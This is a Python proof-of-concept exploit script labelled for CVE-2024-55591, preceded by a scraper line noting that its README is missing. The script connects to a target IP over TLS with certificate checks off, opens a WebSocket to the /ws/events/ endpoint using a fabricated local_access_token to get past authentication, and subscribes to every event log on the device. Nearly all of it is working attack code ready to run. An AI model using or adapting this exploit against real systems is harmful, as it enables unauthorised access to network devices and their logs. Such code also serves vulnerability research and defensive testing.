README.md
README.md not found for CVE-2024-55591. The file may not exist in the repository.
#!/usr/bin/python3
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from uuid import uuid4
from datetime import datetime, timedelta
from pwn import *
import requests
import random
import argparse
import ssl
import socket
import threading
import http.client
import re
import urllib.parse
import time
import hashlib
import math
import random
import string
import struct
import subprocess
import json
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
HOST = "192.168.182.188"
PORT = 443
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
CIPHERS = "ECDHE-RSA-AES256-SHA@SECLEVEL=0"
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
context.set_ciphers(CIPHERS)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
def create_ssl_socket():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
ssl_sock = context.wrap_socket(sock)
return ssl_sock
def try_read_response(sock) -> bytes:
def read_or_raise(n):
read = sock.read(n)
if not read:
raise RuntimeError(f"Unable to read response headers: {headers}")
return read
count = 0
max_count = 10
while not (headers := sock.read(1)):
count += 1
time.sleep(0.1)
if count == max_count:
raise RuntimeError(f"Unable to read response headers: {headers}")
while b"\r\n\r\n" not in headers:
headers += read_or_raise(100)
return headers
def upgrade_http_to_websocket_req(sock, path: str,websocket_key) -> bytes:
request = (
f"GET {path} HTTP/1.1\r\n"
f"Host: {HOST}:{PORT}\r\n"
f"Connection: keep-alive, Upgrade\r\n"
f"Sec-WebSocket-Version: 13\r\n"
f"Sec-WebSocket-Key: {websocket_key}\r\n"
f"Upgrade: websocket\r\n"
f"\r\n"
)
sock.sendall(request.encode())
return try_read_response(sock)
def generate_websocket_key():
return base64.b64encode(bytes(''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789') for i in range(16)]), 'utf-8')).decode('utf-8')
def create_websocket():
sk = create_ssl_socket()
websocket_key = generate_websocket_key()
response_header = upgrade_http_to_websocket_req(sk,"/ws/events/?local_access_token=a5a5a5a5a5a5adasda8sd8sd8ewerfgfg",websocket_key)
if "HTTP/1.1 101 Switching Protocols" not in response_header.decode("utf-8"):
raise Exception("WebSocket handshake failed!")
accept_key = None
for line in response_header.decode("utf-8").split('\r\n'):
if line.startswith('Sec-WebSocket-Accept'):
accept_key = line.split(':')[1].strip()
break
expected_accept_key = base64.b64encode(hashlib.sha1((websocket_key + GUID).encode('utf-8')).digest()).decode('utf-8')
if accept_key != expected_accept_key:
raise Exception("WebSocket handshake validation failed!")
print("WebSocket handshake successful!")
return sk
def parse_websocket_frame(frame):
first_byte = frame[0]
second_byte = frame[1]
# FIN, RSV1, RSV2, RSV3, Opcode
fin = (first_byte >> 7) & 0x01
rsv1 = (first_byte >> 6) & 0x01
rsv2 = (first_byte >> 5) & 0x01
rsv3 = (first_byte >> 4) & 0x01
opcode = first_byte & 0x0F
# Mask and Payload length
mask = (second_byte >> 7) & 0x01
payload_length = second_byte & 0x7F
offset = 2
if payload_length == 126:
payload_length = struct.unpack('>H', frame[offset:offset + 2])[0]
offset += 2
elif payload_length == 127:
payload_length = struct.unpack('>Q', frame[offset:offset + 8])[0]
offset += 8
masking_key = frame[offset:offset + 4] if mask else None
if mask:
offset += 4
payload_data = frame[offset:offset + payload_length]
if mask:
payload_data = bytes([payload_data[i] ^ masking_key[i % 4] for i in range(len(payload_data))])
return {
'fin': fin,
'rsv': (rsv1, rsv2, rsv3),
'opcode': opcode,
'mask': mask,
'payload_length': payload_length,
'payload_data': payload_data
}
def receive_websocket_frame(sock):
frame_header = sock.read(2)
if len(frame_header) < 2:
return Exception("Not valid websocket data!")
frame = frame_header
payload_length = frame[1] & 0x7F
if payload_length == 126:
frame += sock.read(2)
payload_length = struct.unpack(">H", frame[2:4])[0]
elif payload_length == 127:
frame += sock.read(8)
payload_length = struct.unpack(">Q", frame[2:10])[0]
frame += sock.read(payload_length)
return parse_websocket_frame(frame)
def generate_masking_key():
return bytes([random.randint(0, 255) for _ in range(4)])
def send_websocket_frame(sock, payload_data, opcode=0x1):
payload_length = len(payload_data)
first_byte = 0b10000000 | (opcode & 0x0F)
second_byte = 0b10000000 # 默认 Mask = 1
if payload_length <= 125:
header = bytearray([first_byte, second_byte | (payload_length & 0x7F)])
header.extend(generate_masking_key())
masked_payload = bytes([payload_data[i] ^ header[2 + (i % 4)] for i in range(payload_length)])
frame = header + masked_payload
elif payload_length >= 126 and payload_length <= 65535:
header = bytearray([first_byte, second_byte | 0x7E])
header.extend(struct.pack('>H', payload_length))
header.extend(generate_masking_key())
masked_payload = bytes([payload_data[i] ^ header[4 + (i % 4)] for i in range(payload_length)])
frame = header + masked_payload
elif payload_length > 65535:
header = bytearray([first_byte, second_byte | 0x7F])
header.extend(struct.pack('>Q', payload_length))
header.extend(generate_masking_key())
masked_payload = bytes([payload_data[i] ^ header[10 + (i % 4)] for i in range(payload_length)])
frame = header + masked_payload
sock.send(frame)
def main():
global HOST
global PORT
parser = argparse.ArgumentParser(description='CVE-2024-55591 poc')
parser.add_argument('--target', '-t', type=str, help='IP address of the target', required=True)
parser.add_argument('--port', '-p', type=int, help='Port of the target', required=False, default=443)
args = parser.parse_args()
HOST = args.target
PORT = args.port
sk = create_websocket()
data = receive_websocket_frame(sk)
print(data)
send_websocket_frame(sk,json.dumps({"type":"eventLogSubscribe","payload":"*"}).encode())
while True:
data = receive_websocket_frame(sk)
print(data)
if __name__ == "__main__":
main()